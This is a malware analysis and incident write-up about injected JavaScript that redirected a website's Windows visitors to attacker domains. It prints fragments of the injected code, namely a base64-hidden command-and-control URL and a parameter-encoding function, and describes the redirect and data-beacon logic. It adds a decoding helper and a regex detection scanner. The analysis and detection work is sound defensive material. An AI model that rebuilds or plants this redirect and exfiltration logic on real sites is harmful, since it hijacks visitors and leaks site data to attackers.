Analyticacnodec.com and Analytwave.com Redirect Malware
July 19, 2025

Issue Reported
The client reported unauthorized redirects from their website to a malicious URL: https://analyticacnodec.com/d3af16CD2ebF1718/. The redirect occurred selectively on Windows-based browsers, and network requests to analytwave.com were observed in the browser developer tools. The cause was JavaScript injected into two site files, producing intermittent hijacks. Key concerns were visitor data theft, SEO penalties, and potential server compromise.
Malware Type
This is a sophisticated Browser Redirect Malware, classified as a JavaScript-based Redirect Hijacker. It employs obfuscation, dynamic API calls, and conditional logic to redirect users to attacker-controlled domains (e.g., analyticacnodec.com variants). Often part of malvertising or supply-chain attacks, it targets specific environments to evade detection. Key traits include:
- Obfuscation: Heavy use of base64 encoding and layered decoding (e.g., decodeURIComponent(escape(atob(…)))) to conceal C2 (command-and-control) endpoints like https://analytwave.com/api/getUrl.
- Targeted Execution: User-agent parsing to activate only on Windows 10/11 with recent Chrome (120-139.x), Edge (120-139.x), or Firefox (130-149.x) versions, likely exploiting browser-specific vulnerabilities or ad networks.
- Dynamic Behavior: Fetches redirect URLs from a remote API, allowing attackers to update payloads (e.g., phishing pages, exploit kits, or ransomware droppers) without altering the injected code.
- Persistence: Stores a “verified” flag in localStorage to avoid repeated redirects on the same device, maintaining stealth.
- Risks: Beyond redirects, it encodes and sends site data (e.g., domain, favicon) to the attackers, potentially for reconnaissance or ad fraud. It resembles known campaigns built on malvertising redirect chains.
Code Breakdown and Decoding
To fully understand this malware, we performed a static analysis and decoding. The code is an asynchronous immediately-invoked function expression (IIFE) designed for browser injection. It begins with base64 decoding of the command-and-control (C2) URL:
let e=decodeURIComponent(escape(atob("aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA==")));
Decoded step by step: first, atob("aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA==") converts the base64 string to “https://analytwave.com/api/getUrl”. Then escape(...) percent-encodes each byte of that result, and decodeURIComponent(...) reads the percent sequences back as UTF-8 text. This pair is the classic idiom for turning atob's byte string into properly decoded text; for an ASCII-only URL like this one it leaves the string unchanged. The result is the final C2 endpoint, and the layering hides the primary server used for fetching dynamic redirect targets.
Next, there’s a custom encoding function:
function t(e){return btoa(unescape(encodeURIComponent(e)))}
This encodes data by applying encodeURIComponent, unescape, and btoa (base64) in turn, the exact reverse of the decode chain above. It is used to obfuscate parameters such as the current domain and favicon URL before transmission, making the exfiltrated data harder to spot in traffic.
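As an added example (this is not the injected code, nor tooling from the write-up), the two one-liners above rewritten as named helpers, with a round-trip check and a look at what the base64-wrapped parameters look like on the wire; the hostname and favicon path passed in are placeholder values. One check worth running yourself: the base64 literal exactly as printed above decodes to https://analytiwave.com/api/getUrl, with an extra “i” compared with the analytwave.com domain named in this write-up, so blocklists should be built from the bytes actually decoded out of the injected file rather than from a spelling copied from a report.

```javascript
// Added example (not the injected code or the write-up's own tooling): the two
// encoding chains from the analysis, named for readability, plus a round-trip
// check. Runs under Node 16+ or in a browser console; no network access.

// Mirrors `decodeURIComponent(escape(atob(s)))`: base64 -> byte string ->
// percent-encoded -> UTF-8 decoded text. The escape/decodeURIComponent pair is
// what lets plain atob() output survive non-ASCII bytes.
function decodeLayered(b64) {
  return decodeURIComponent(escape(atob(b64)));
}

// Mirrors `function t(e){return btoa(unescape(encodeURIComponent(e)))}`:
// text -> UTF-8 percent-encoded -> byte string -> base64.
function encodeLayered(text) {
  return btoa(unescape(encodeURIComponent(text)));
}

// The base64 literal exactly as printed in the injected snippet.
const C2_LITERAL = "aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA==";

// Decodes the literal, extracts the hostname, and re-encodes the result to
// confirm the decode lost nothing.
function analyzeC2Literal() {
  const decoded = decodeLayered(C2_LITERAL);
  const reencoded = encodeLayered(decoded);
  let host = null;
  try { host = new URL(decoded).hostname; } catch { /* not a URL */ }
  return { decoded, host, roundTripOk: reencoded === C2_LITERAL };
}

// Shows what the `domain=` and `link=` parameters look like on the wire for a
// constructed hostname and favicon URL, so responders can recognise base64
// host names in proxy or WAF logs. "example.com" is a placeholder value.
function encodeExfilParams(hostname, faviconUrl) {
  return {
    domain: encodeLayered(hostname),
    link: faviconUrl ? encodeLayered(faviconUrl) : null,
  };
}

// Demonstrates why the obfuscator bothers with escape()/unescape(): plain
// btoa() only accepts Latin-1 input, but the wrapped form round-trips any text.
function roundTripsUtf8(text) {
  return decodeLayered(encodeLayered(text)) === text;
}

if (typeof module !== "undefined" && require.main === module) {
  console.log(analyzeC2Literal());
  console.log(encodeExfilParams("example.com", "https://example.com/favicon.ico"));
  console.log(roundTripsUtf8("日本語ドメイン.example"));
}
```

Run it with node; it also works pasted into a browser console, since it only uses the same built-ins the injected code relies on.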
The code then parses query parameters from window.location.search into an object. If a “verified” parameter is present, it sets the localStorage key "verified" to “true”. This acts as a persistence flag and gives the operator remote control: attackers can append ?verified=1 to bypass checks on compromised sites.
An async fetch function handles communication:
async function i(o=1){...}
It attempts to fetch from the decoded C2 URL. On success, it parses the JSON response for a .url value and appends parameters such as /?wsid=${hostname}&domain=${encoded hostname}. If the request fails (after basic retry logic), it falls back to a hardcoded endpoint with similar parameters. This is how the dynamic redirect target (e.g., https://analyticacnodec.com/d3af16CD2ebF1718/) is retrieved, which lets the operators change the destination without touching the injected code and keeps the malware adaptable.
Finally, the user-agent checks and execution logic grab the favicon via document.querySelector('link[rel="icon"]') and parse the UA for Windows NT 10.0 and the specific browser versions listed above. If localStorage does not contain the “verified” flag and the conditions match, it calls the fetch function to obtain the redirect URL, appends &link=${encoded favicon} when a favicon is available, and performs window.location.replace with the result. This selective targeting maximizes success on vulnerable setups while avoiding sandboxes and non-target systems.
Overall, the code’s modularity suggests origins from a malware-as-a-service kit, with analytwave.com serving as a redirector to endpoints like analyticacnodec.com. It combines obfuscation, dynamic fetching, and persistence for effective, hard-to-detect browser-based attacks.
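An indicator scanner, added here as an example rather than taken from the write-up, that applies the traits above to file contents: it matches the layered decode and encode chains, the localStorage “verified” flag, the Windows NT 10.0 gate, location.replace and the wsid parameter, and it decodes every atob("...") literal so hidden URLs surface in the output. The indicator names, the threshold of three, the allowedHosts parameter and both sample inputs are constructed for the example; the suspicious sample is a non-functional fragment that carries the indicators without the fetch or redirect logic.

```javascript
// Added example, not from the write-up: a small indicator scanner for site
// files, in the spirit of the checks a responder would run over theme and
// plugin JavaScript after a redirect report. Pattern names and the threshold
// are my own choices; the sample inputs at the bottom are constructed.

const INDICATORS = [
  // layered base64 decode chain used to hide the C2 URL
  { name: "layered-base64-decode", re: /decodeURIComponent\s*\(\s*escape\s*\(\s*atob\s*\(/ },
  // matching encode chain applied to exfiltrated parameters
  { name: "layered-base64-encode", re: /btoa\s*\(\s*unescape\s*\(\s*encodeURIComponent\s*\(/ },
  // localStorage "verified" persistence flag
  { name: "verified-flag", re: /localStorage[^;\n]{0,60}["']verified["']/ },
  // Windows-only user-agent gate
  { name: "windows-ua-gate", re: /Windows NT 10\.0/ },
  // redirect primitive
  { name: "location-replace", re: /location\.replace\s*\(/ },
  // beacon parameter seen in the fetched URL
  { name: "wsid-param", re: /[?&]wsid=/ },
];

// Finds every atob("...") literal and decodes it the way the injected code
// would, falling back to the raw Latin-1 string when the bytes are not UTF-8.
function decodeAtobLiterals(source) {
  const out = [];
  for (const m of source.matchAll(/atob\s*\(\s*(["'`])([A-Za-z0-9+\/=]+)\1\s*\)/g)) {
    let text;
    try {
      text = decodeURIComponent(escape(atob(m[2])));
    } catch {
      try { text = atob(m[2]); } catch { continue; }
    }
    out.push(text);
  }
  return out;
}

// Scans one file's contents. `allowedHosts` are hostnames the site itself
// legitimately talks to; any decoded URL pointing elsewhere is reported.
function scanForRedirectHijacker(source, allowedHosts = []) {
  const hits = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.name);
  const decodedStrings = decodeAtobLiterals(source);
  const hiddenUrls = [];
  for (const s of decodedStrings) {
    try {
      const host = new URL(s).hostname;
      if (!allowedHosts.includes(host)) hiddenUrls.push(s);
    } catch { /* decoded text is not a URL */ }
  }
  if (hiddenUrls.length) hits.push("hidden-external-url");
  return { indicators: hits, decodedStrings, hiddenUrls, suspicious: hits.length >= 3 };
}

// Constructed, non-functional fragment carrying the indicators described in
// the analysis (the network and redirect parts are left as a comment).
const SAMPLE_INJECTED = `(async()=>{let e=decodeURIComponent(escape(atob("aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA==")));
function t(e){return btoa(unescape(encodeURIComponent(e)))}
if(localStorage.getItem("verified")!=="true"&&navigator.userAgent.includes("Windows NT 10.0")){
  /* fetch e, then window.location.replace(...) with ?wsid=... */
}})();`;

// Constructed benign file: uses atob() once for a harmless identifier.
const SAMPLE_BENIGN = `document.addEventListener("DOMContentLoaded",()=>{const id=atob("dXNlci0xMjM=");console.log(id);});`;

if (typeof module !== "undefined" && require.main === module) {
  console.log(scanForRedirectHijacker(SAMPLE_INJECTED, ["example.com"]));
  console.log(scanForRedirectHijacker(SAMPLE_BENIGN, ["example.com"]));
}
```

Because it is regex-based and does not parse JavaScript, it will also flag indicators that sit inside comments, as the sample shows; treat the output as triage hints to confirm by reading the file, and extend allowedHosts with the site's own domains so legitimate base64-encoded URLs are not reported.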
Result
- Full eradication achieved – the site no longer redirects
- Scans report zero threats
- SEO integrity preserved – no blacklisting
- Client gained an enhanced security posture, preventing future incidents